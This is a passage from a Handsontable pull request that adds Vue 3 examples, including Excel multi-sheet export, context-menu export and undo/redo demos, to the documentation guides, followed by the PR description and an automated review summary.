+For more information, see the [Referencing the Handsontable instance in Vue 3](@/guides/integrate-with-vue3/vue3-hot-reference/vue3-hot-reference.md) page.
 
 :::
 
@@ -159,6 +193,16 @@ const blob = await exportPlugin.exportAsBlob('xlsx', { filename: 'my-report' });
 
 ```jsx
 const exportPlugin = hotRef.current?.hotInstance?.getPlugin('exportFile');
+
+await exportPlugin?.downloadFileAsync('xlsx', { filename: 'my-report' });
+```
+
+:::
+
+::: only-for vue
+
+```js
+const exportPlugin = hotRef.value?.hotInstance?.getPlugin('exportFile');
 
 await exportPlugin?.downloadFileAsync('xlsx', { filename: 'my-report' });
 ```
@@ -232,6 +276,16 @@ Use the `sheets` option to export multiple Handsontable instances into a single 
 :::
 :::
 
+::: only-for vue
+
+::: example #example2 :vue3
+
+@[code](@/content/guides/accessories-and-menus/export-to-excel/vue/example2.vue)
+
+:::
+
+:::
+
 ## Context menu
 
 When the context menu is enabled, **Export to CSV** and **Export to Excel** items are automatically added to the grid's context menu. No extra configuration in `exportFile` is needed.
@@ -266,6 +320,16 @@ When you select a cell range before opening the context menu, the export covers 
 @[code](@/content/guides/accessories-and-menus/export-to-excel/angular/example3.html)
 
 :::
+:::
+
+::: only-for vue
+
+::: example #example3 :vue3
+
+@[code](@/content/guides/accessories-and-menus/export-to-excel/vue/example3.vue)
+
+:::
+
 :::
 
 ## Cell types and styling

--- a/docs/content/guides/accessories-and-menus/export-to-excel/vue/example1.vue
+++ b/docs/content/guides/accessories-and-menus/export-to-excel/vue/example1.vue
@@ -1,0 +1,94 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import ExcelJS from 'exceljs';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotRef = ref<InstanceType<typeof HotTable> | null>(null);
+
+const hotData = [
+  ['Alice Martin', 'North', 142000, true, 'Exceeded Q1 target by 18%.'],
+  ['Bob Chen', 'East', 98500, true, 'Strong pipeline for Q2.'],
+  ['Carol Davies', 'South', 76200, false, 'Needs coaching on closing.'],
+  ['David Kim', 'West', 115300, true, 'Cross-sell opportunity.'],
+  ['Eva Rossi', 'North', 54800, false, 'Sick leave impacted March.'],
+  ['TOTALS', '', null, '', ''],
+];
+
+const hotSettings = ref<GridSettings>({
+  data: hotData,
+  nestedHeaders: [
+    [
+      { label: 'Sales Representative', colspan: 2, headerClassName: 'htCenter' },
+      { label: 'Results', colspan: 2, headerClassName: 'htCenter' },
+      { label: 'Notes', colspan: 1, headerClassName: 'htLeft' },
+    ],
+    ['Name', 'Region', 'Revenue ($)', 'Hit Target?', 'Notes'],
+  ],
+  columns: [
+    { type: 'text' },
+    { type: 'dropdown', source: ['North', 'South', 'East', 'West'] },
+    {
+      type: 'numeric',
+      locale: 'en-US',
+      numericFormat: { style: 'currency', currency: 'USD', minimumFractionDigits: 2 },
+    },
+    { type: 'checkbox' },
+    { type: 'text' },
+  ],
+  columnSummary: [
+    {
+      sourceColumn: 2,
+      destinationRow: 5,
+      destinationColumn: 2,
+      type: 'sum',
+      forceNumeric: true,
+    },
+  ],
+  mergeCells: [{ row: 5, col: 0, rowspan: 1, colspan: 2 }],
+  customBorders: [{ row: 5, col: 2, top: { width: 2, color: '#333333' } }],
+  cell: [
+    { row: 5, col: 0, readOnly: true },
+    { row: 5, col: 2, readOnly: true },
+  ],
+  fixedColumnsStart: 1,
+  rowHeaders: true,
+  colHeaders: false,
+  height: 'auto',
+  autoWrapRow: true,
+  autoWrapCol: true,
+  exportFile: { engines: { xlsx: ExcelJS } },
+  afterInit() {
+    this.setCellMeta(0, 4, 'comment', { value: 'Top sales rep — review for promotion.' });
+    this.render();
+  },
+  licenseKey: 'non-commercial-and-evaluation',
+});
+
+async function exportFile(): Promise<void> {
+  const exportPlugin = hotRef.value?.hotInstance?.getPlugin('exportFile');
+
+  await exportPlugin?.downloadFileAsync('xlsx', {
+    filename: 'Q1-Sales-Report',
+    colHeaders: true,
+    rowHeaders: true,
+    exportFormulas: true,
+  });
+}
+</script>
+
+<template>
+  <div id="example1">
+    <div class="example-controls-container">
+      <div class="controls">
+        <button type="button" @click="exportFile">
+          Export XLSX
+        </button>
+      </div>
+    </div>
+    <HotTable ref="hotRef" :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/export-to-excel/vue/example2.vue
+++ b/docs/content/guides/accessories-and-menus/export-to-excel/vue/example2.vue
@@ -1,0 +1,85 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import ExcelJS from 'exceljs';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotQ1Ref = ref<InstanceType<typeof HotTable> | null>(null);
+const hotQ2Ref = ref<InstanceType<typeof HotTable> | null>(null);
+
+const q1Data = [
+  ['Alice Martin', 'North', 142000, true],
+  ['Bob Chen', 'East', 98500, true],
+  ['Carol Davies', 'South', 76200, false],
+  ['David Kim', 'West', 115300, true],
+  ['Eva Rossi', 'North', 54800, false],
+];
+
+const q2Data = [
+  ['Alice Martin', 'North', 158000, true],
+  ['Bob Chen', 'East', 112400, true],
+  ['Carol Davies', 'South', 89100, true],
+  ['David Kim', 'West', 97600, false],
+  ['Eva Rossi', 'North', 63200, true],
+];
+
+const sharedSettings: GridSettings = {
+  columns: [
+    { type: 'text' },
+    { type: 'dropdown', source: ['North', 'South', 'East', 'West'] },
+    {
+      type: 'numeric',
+      locale: 'en-US',
+      numericFormat: { style: 'currency', currency: 'USD', minimumFractionDigits: 2 },
+    },
+    { type: 'checkbox' },
+  ],
+  colHeaders: ['Name', 'Region', 'Revenue ($)', 'Hit Target?'],
+  rowHeaders: true,
+  height: 'auto',
+  autoWrapRow: true,
+  autoWrapCol: true,
+  exportFile: { engines: { xlsx: ExcelJS } },
+  licenseKey: 'non-commercial-and-evaluation',
+};
+
+const hotQ1Settings = ref<GridSettings>({ ...sharedSettings, data: q1Data });
+const hotQ2Settings = ref<GridSettings>({ ...sharedSettings, data: q2Data });
+
+async function exportSheets(): Promise<void> {
+  const hotQ1 = hotQ1Ref.value?.hotInstance;
+  const hotQ2 = hotQ2Ref.value?.hotInstance;
+  const exportPlugin = hotQ1?.getPlugin('exportFile');
+
+  if (!hotQ1 || !hotQ2 || !exportPlugin) {
+    return;
+  }
+
+  await exportPlugin.downloadFileAsync('xlsx', {
+    filename: 'Annual-Sales-Report',
+    sheets: [
+      { instance: hotQ1, name: 'Q1 Sales', colHeaders: true, rowHeaders: true },
+      { instance: hotQ2, name: 'Q2 Sales', colHeaders: true, rowHeaders: true },
+    ],
+  });
+}
+</script>
+
+<template>
+  <div id="example2">
+    <div class="example-controls-container">
+      <div class="controls">
+        <button type="button" @click="exportSheets">
+          Export XLSX
+        </button>
+      </div>
+    </div>
+    <p><strong>Q1 Sales</strong></p>
+    <HotTable ref="hotQ1Ref" :settings="hotQ1Settings" />
+    <p><strong>Q2 Sales</strong></p>
+    <HotTable ref="hotQ2Ref" :settings="hotQ2Settings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/export-to-excel/vue/example3.vue
+++ b/docs/content/guides/accessories-and-menus/export-to-excel/vue/example3.vue
@@ -1,0 +1,47 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import ExcelJS from 'exceljs';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotSettings = ref<GridSettings>({
+  data: [
+    ['Laptop Pro 15"', 'Electronics', 1299.99, 38, true],
+    ['Wireless Mouse', 'Accessories', 29.99, 214, true],
+    ['USB-C Hub 7-in-1', 'Accessories', 49.99, 87, true],
+    ['Monitor 27" 4K', 'Electronics', 449.99, 12, false],
+    ['Mech Keyboard', 'Accessories', 119.99, 65, true],
+  ],
+  columns: [
+    { type: 'text' },
+    { type: 'dropdown', source: ['Electronics', 'Accessories', 'Software'] },
+    {
+      type: 'numeric',
+      locale: 'en-US',
+      numericFormat: { style: 'currency', currency: 'USD', minimumFractionDigits: 2 },
+    },
+    { type: 'numeric' },
+    { type: 'checkbox' },
+  ],
+  colHeaders: ['Product', 'Category', 'Unit Price', 'Stock', 'Active?'],
+  rowHeaders: true,
+  height: 'auto',
+  autoWrapRow: true,
+  autoWrapCol: true,
+  contextMenu: true,
+  exportFile: { engines: { xlsx: ExcelJS } },
+  licenseKey: 'non-commercial-and-evaluation',
+});
+</script>
+
+<template>
+  <div id="example3">
+    <div class="example-controls-container">
+      <p>Right-click any cell to open the context menu.</p>
+    </div>
+    <HotTable :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/undo-redo/undo-redo.md
+++ b/docs/content/guides/accessories-and-menus/undo-redo/undo-redo.md
@@ -76,6 +76,16 @@ Make some changes to the grid below and the use the <kbd>**Ctrl**</kbd>/<kbd>⌘
 
 :::
 
+::: only-for vue
+
+::: example #example :vue3
+
+@[code](@/content/guides/accessories-and-menus/undo-redo/vue/example.vue)
+
+:::
+
+:::
+
 ## Known limitations
 
 Not all user-triggered actions are recorded in the undo-and-redo history.

--- a/docs/content/guides/accessories-and-menus/undo-redo/vue/example.vue
+++ b/docs/content/guides/accessories-and-menus/undo-redo/vue/example.vue
@@ -1,0 +1,35 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotSettings = ref<GridSettings>({
+  data: [
+    ['A1', 'B1', 'C1', 'D1', 'E1'],
+    ['A2', 'B2', 'C2', 'D2', 'E2'],
+    ['A3', 'B3', 'C3', 'D3', 'E3'],
+    ['A4', 'B4', 'C4', 'D4', 'E4'],
+    ['A5', 'B5', 'C5', 'D5', 'E5'],
+    ['A6', 'B6', 'C6', 'D6', 'E6'],
+    ['A7', 'B7', 'C7', 'D7', 'E7'],
+    ['A8', 'B8', 'C8', 'D8', 'E8'],
+    ['A9', 'B9', 'C9', 'D9', 'E9'],
+  ],
+  rowHeaders: true,
+  colHeaders: true,
+  stretchH: 'all',
+  height: 'auto',
+  autoWrapRow: true,
+  autoWrapCol: true,
+  licenseKey: 'non-commercial-and-evaluation',
+});
+</script>
+
+<template>
+  <div id="example">
+    <HotTable :settings="hotSettings" />
+  </div>
+</template>


### PR DESCRIPTION
### Context

The PR adds Vue 3 documentation examples to six Accessories and menus guides (context menu, drag to scroll, empty data state, export to CSV, export to Excel, undo and redo) so they match the existing JavaScript, React, and Angular coverage. Each interactive demo uses `<script setup lang="ts">`, `@handsontable/vue3`, and the same patterns as other Vue 3 integration guides. Icon pack is prose-only and unchanged.

### How has this been tested?

- `pnpm dev` in `docs/` — verified all seven Vue routes return 200 and the expected number of live examples (`data-example-vue` counts: 4 + 2 + 3 + 4 + 3 + 1 + 0 for icon-pack).
- Manual preview in the browser on the Vue framework tab (live demos and StackBlitz).

### Types of changes

- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature or improvement (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] Additional language file or change to the existing one (translations)

### Related issue(s):

1. DEV-1745

### Affected project(s):

- [ ] `handsontable`
- [ ] `@handsontable/angular-wrapper`
- [ ] `@handsontable/react-wrapper`
- [ ] `@handsontable/vue3`

### Checklist:

- [x] I have reviewed the guidelines about [Contributing to Handsontable](https://github.com/handsontable/handsontable/blob/master/CONTRIBUTING.md) and I confirm that my code follows the code style of this project.
- [x] I have signed the [Contributor License Agreement](https://docs.google.com/forms/d/e/1FAIpQLScpMq4swMelvw3-onxC8Jl29m0fVp5hpf7d1yQVklqVjGjWGA/viewform?c=0&w=1)
- [x] My change requires a change to the documentation.

[skip changelog]

ClickUp task: https://app.clickup.com/t/9015210959/DEV-1745

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **Low Risk**
> Docs and example assets only; no changes to grid libraries, auth, or production code paths.
> 
> **Overview**
> Adds **Vue 3** live examples and framework-specific snippets to six **Accessories and menus** guides so the Vue tab matches JS/React/Angular coverage.
> 
> Each guide gets `::: only-for vue` blocks with `:vue3` examples wired to new `.vue` files under `vue/`. Demos use `<script setup lang="ts">`, `@handsontable/vue3`, and `registerAllModules()`. Where the grid API is needed (CSV/XLSX export, empty-state buttons, multi-sheet export), examples use a `HotTable` ref and `hotInstance`.
> 
> **Context menu** — four examples (default, selected items, fully custom, custom options). **Drag to scroll** — two (basic + sliders via `computed` settings). **Empty data state** — three (basic, custom message/buttons, filter-aware `message` callback). **Export to CSV** — four (download, blob, string, CSV injection sanitization). **Export to Excel** — three demos plus Vue-only ExcelJS setup, `hotRef` usage tip, and async `downloadFileAsync` snippet. **Undo/redo** — one basic demo.
> 
> No runtime or `@handsontable/vue3` package changes—docs only.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit 180d419058775a4af19024c4caca949627343527. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->